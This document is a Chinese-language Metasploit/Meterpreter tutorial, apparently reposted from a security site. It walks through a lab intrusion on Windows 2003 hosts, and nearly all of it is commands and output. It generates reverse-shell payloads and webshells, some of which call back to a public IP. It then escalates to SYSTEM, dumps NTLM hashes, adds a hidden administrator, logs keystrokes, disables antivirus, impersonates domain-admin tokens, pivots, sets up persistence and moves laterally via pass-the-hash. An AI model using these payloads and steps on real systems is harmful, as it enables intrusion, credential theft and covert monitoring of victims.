meterpreter普及(含续)
详细命令::~# cd /tmp/
# mkdir keio
# cd keio
# ls -al
总用量 8
drwxr-xr-x 2 root root 4096 2012-10-26 02:59 .
drwxrwxrwt 11 root root 4096 2012-10-26 02:59 ..
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 X > /tmp/keio/payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.0.167", "LPORT"=>"443"}
# ls -al
总用量 84
drwxr-xr-x 2 root root 4096 2012-10-26 03:00 .
drwxrwxrwt 11 root root 4096 2012-10-26 02:59 ..
-rw-r--r-- 1 root root 73802 2012-10-26 03:00 payload.exe
#
-------------------------------------------
目标主机ip192.168.0.246 2003下添加普通用户 利用Meterpreter提权 也可以用来webshell上提权
C:\Documents and Settings\Administrator>net user keio keio.asd /add
命令成功完成。
C:\Documents and Settings\Administrator>net user keio
用户名 keio
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2012-10-26 15:01
密码到期 2012-12-8 13:48
密码可更改 2012-10-26 15:01
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
C:\Documents and Settings\Administrator>
------------------------------------------------------------
BT5下打开另一个终端 并监听后门exe
:~# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E
[*] Please wait while we load the module tree...
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V4 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.0.167
LPORT => 443
[*] Started reverse handler on 192.168.0.167:443
[*] Starting the payload handler...
此时将刚才生成exe后门 放到2003主机上运行 也可以是webshell下提权运行
如果运行就会获得一个meterpreter
[*] Started reverse handler on 192.168.0.167:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.0.246
[*] Meterpreter session 1 opened (192.168.0.167:443 -> 192.168.0.246:1036) at 2012-10-26 03:10:03 -0400
meterpreter > getuid
Server username: KEIO-850DBAD911\Administrator
meterpreter > shell
Process 2448 created.
Channel 1 created.
Microsoft Windows [?汾 5.2.3790]
(C) ??????? 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\????>net user keio
net user keio
????? keio
???
???
????????
????(????)???? 000 (??????)
??????? Yes
??????? ???
??????????? 2012-10-26 15:01
?????? 2012-12-8 13:48
????????? 2012-10-26 15:01
??????? Yes
?????????????? Yes
?????????? All
??????
??????????
????
??ε?? ???
??????????С??? All
????????? *Users
???????? *None
??????????ɡ?
C:\Documents and Settings\Administrator\????>^Z (ctrl +z)
ackground channel 1? [y/N] y
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem 权限提升
..got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump (需要system权限抓hash)
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY bdcf1f289008f1eea7b42d7b6b0e1306...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:246f6b6da6b0dd59ef189f2a65f3f0ca:::
ASPNET:1003:8607cfc7e85b23193eea6d0e417a1498:1af6226ed57db97d49a58c2ec2f3f713:::
keio:1006:047770cf7e1a2a874a3b108f3fa6cb6d:da1e539768c66a250b5858e2665c8f34::: meterpreter > ps 列进程Process List www.2cto.com
============ PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
300 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
332 316 explorer.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\Explorer.EXE
348 300 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
372 300 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
420 372 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
432 372 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
496 1632 conime.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\conime.exe
616 420 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
624 332 ctfmon.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\ctfmon.exe
636 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
712 420 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
772 420 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
792 420 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
820 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
916 332 VMwareTray.exe x86 0 KEIO-850DBAD911\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
952 420 WVSScheduler.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Acunetix\Web Vulnerability Scanner 8\WVSScheduler.exe
964 332 vmtoolsd.exe x86 0 KEIO-850DBAD911\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1092 1432 TPAutoConnect.exe x86 0 KEIO-850DBAD911\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
1136 420 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1332 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1432 420 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1512 420 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
1632 332 cmd.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\cmd.exe
1680 420 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
1704 420 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2080 636 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
2392 332 payload.exe x86 0 KEIO-850DBAD911\Administrator $U$C:\Documents and Settings\Administrator\\payload.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e65c7061796c6f61642e657865
2448 2392 cmd.exe x86 0 KEIO-850DBAD911\Administrator C:\WINDOWS\system32\cmd.exe
meterpreter > migrate 332 meterpreter迁移
Migrating to 332
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : KEIO-850DBAD911
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > screenshot 截取目标主机桌面 并会打开
reenshot saved to: /root/TCvXoBVK.jpeg
meterpreter > shell 进入cmd环境
rocess 3532 created.
Channel 2 created.
Microsoft Windows [?汾 5.2.3790]
(C) ??????? 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator>net user 123 123 /ad & net localgroup administrators 123 /ad 添加一个账户123 密码123的管理员用户
???????????
C:\Documents and Settings\Administrator>net localgroup administrators
???
-------------------------------------------------------------------------------
123
Administrator
??????????ɡ?
C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
C:\Documents and Settings\Administrator>tasklist /svc 列进程
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 300 暂缺
csrss.exe 348 暂缺
winlogon.exe 372 暂缺
services.exe 420 Eventlog, PlugPlay
lsass.exe 432 ProtectedStorage, SamSs
vmacthlp.exe 616 VMware Physical Disk Helper Service
svchost.exe 636 DcomLaunch
svchost.exe 712 RpcSs
svchost.exe 772 Dnscache
svchost.exe 792 LmHosts, W32Time
svchost.exe 820 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, HidServ, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, SENS, ShellHWDetection, winmgmt,
wuauserv, WZCSVC
WVSScheduler.exe 952 AcuWVSSchedulerv8
vmtoolsd.exe 1136 VMTools
svchost.exe 1332 TermService
TPAutoConnSvc.exe 1432 TPAutoConnSvc
dllhost.exe 1512 COMSysApp
msdtc.exe 1680 MSDTC
svchost.exe 1704 TapiSrv
explorer.exe 332 暂缺
VMwareTray.exe 916 暂缺
vmtoolsd.exe 964 暂缺
ctfmon.exe 624 暂缺
TPAutoConnect.exe 1092 暂缺
cmd.exe 1632 暂缺
conime.exe 496 暂缺
wmiprvse.exe 2080 暂缺
cmd.exe 2448 暂缺
cmd.exe 3096 暂缺
cmd.exe 3532 暂缺
cmd.exe 3640 暂缺
tasklist.exe 3800 暂缺
wmiprvse.exe 3836 暂缺
C:\Documents and Settings\Administrator>netstat -ano 但是没开终端3389
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 712
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 432
TCP 127.0.0.1:8181 0.0.0.0:0 LISTENING 952
TCP 192.168.0.246:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.246:1036 192.168.0.167:443 ESTABLISHED 2392
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:1025 *:* 772
UDP 0.0.0.0:1027 *:* 772
UDP 127.0.0.1:123 *:* 792
UDP 192.168.0.246:123 *:* 792
UDP 192.168.0.246:137 *:* 4
UDP 192.168.0.246:138 *:* 4
C:\Documents and Settings\Administrator>^Z (ctrl +z)
ackground channel 3? [y/N] y
meterpreter > run getgui -e 开目标主机的终端3389
indows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20121026.3428.rc
meterpreter >
打开另一个终端cmdline
:~# rdesktop 192.168.0.246 linux下连接windows进服务器
ARNING: Remote desktop does not support colour depth 24; falling back to 16
登陆终端即可
msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.jsp
msfcli multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 E
msfpayload php/reverse_php LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.php
msfcli multi/handler PAYLOAD=php/reverse_php LHOST=58.60.195.226 LPORT=1234 E
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167| msfencode -t asp -o webshell.asp
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E
meterpreter > run post/windows/capture/keylog_recorder 开启键盘记录
[*] Executing module against KEIO-850DBAD911
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to/root/.msf4/loot/20121026033842_default_192.168.0.246_host.windows.key_690857.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > exit
[*] Shutting down Meterpreter...
[*] Meterpreter session 1 closed. Reason: User exit
:~#
打开另一个终端查看键盘记录内容
:~# cat /root/.msf4/loot/20121026033842_default_192.168.0.246_host.windows.key_690857.txt
Keystroke log started at 2012-10-26 03:38:42 -0400
i lover ni
:~#
利用hash传替入侵内网其他主机需要其他主机开了445端口 知道hash才行
:~# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.0.167
LHOST => 192.168.0.167
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) >set RHOST 192.168.0.126
RHOST => 192.168.0.126
msf exploit(psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(psexec) > set SMBPass ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba
SMBPass => ca7ad525945f5294565a0faa33e6604d:94259bac898d3c1b3af45a2455ac56ba
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.0.167:443
[*] Connecting to the server...
[*] Authenticating to 192.168.0.126:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Created \PPzjnNQC.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.126[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.126[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (Bdhlogxp - "MHqf")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (752128 bytes) to 192.168.0.126
[*] Closing service handle...
[*] Deleting \PPzjnNQC.exe...
[*] Meterpreter session 1 opened (192.168.0.167:443 -> 192.168.0.126:1062) at 2012-10-26 03:46:49 -0400
meterpreter > sysinfo
Computer : KEIO-850DBAD911
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
meterpreter > shell
Process 3152 created.
Channel 1 created.
Microsoft Windows [?汾 5.2.3790]
(C) ??????? 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ????????:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.126
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
C:\WINDOWS\system32>
meterpreter其他技巧
令牌假冒
ps 列进程
如果域管理登陆过过主机
如进程中有 domainadmin类型的权限进程
steal_token pid 假冒成域管理了 这时候你就爽了
use incognito 加载模块
list_token -u 列出令牌可以假冒的用户
当假冒成功了一个域管理用户之后
添加一个域管理用户
impersonate_token caonima\\domainadmin 注意要双斜杠
add_user keio keio.asd -h 192.168.0.175 (域管理员添加到的目的地址)
add group_user “Domain Admins” keio -h 192.168.0.175
meterpreter跳板攻击其他机器
已拿下的ip为 172.26.36.*
目标却在 192.168.1.*
run get_local_subnets 获取本地子网
backgroup
route 192.168.1.11 255.255.255.0 1
route print
use....
meterpreter脚本
run vnc 在目标主机上装vnc
run screen_unlock
run killav 关闭杀毒软件
run scraper 获取系统信息
控制持久化
run persistence -X -i 60 -p 443 -r 192.168.0.167
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.167
set LPOTR 443
exploit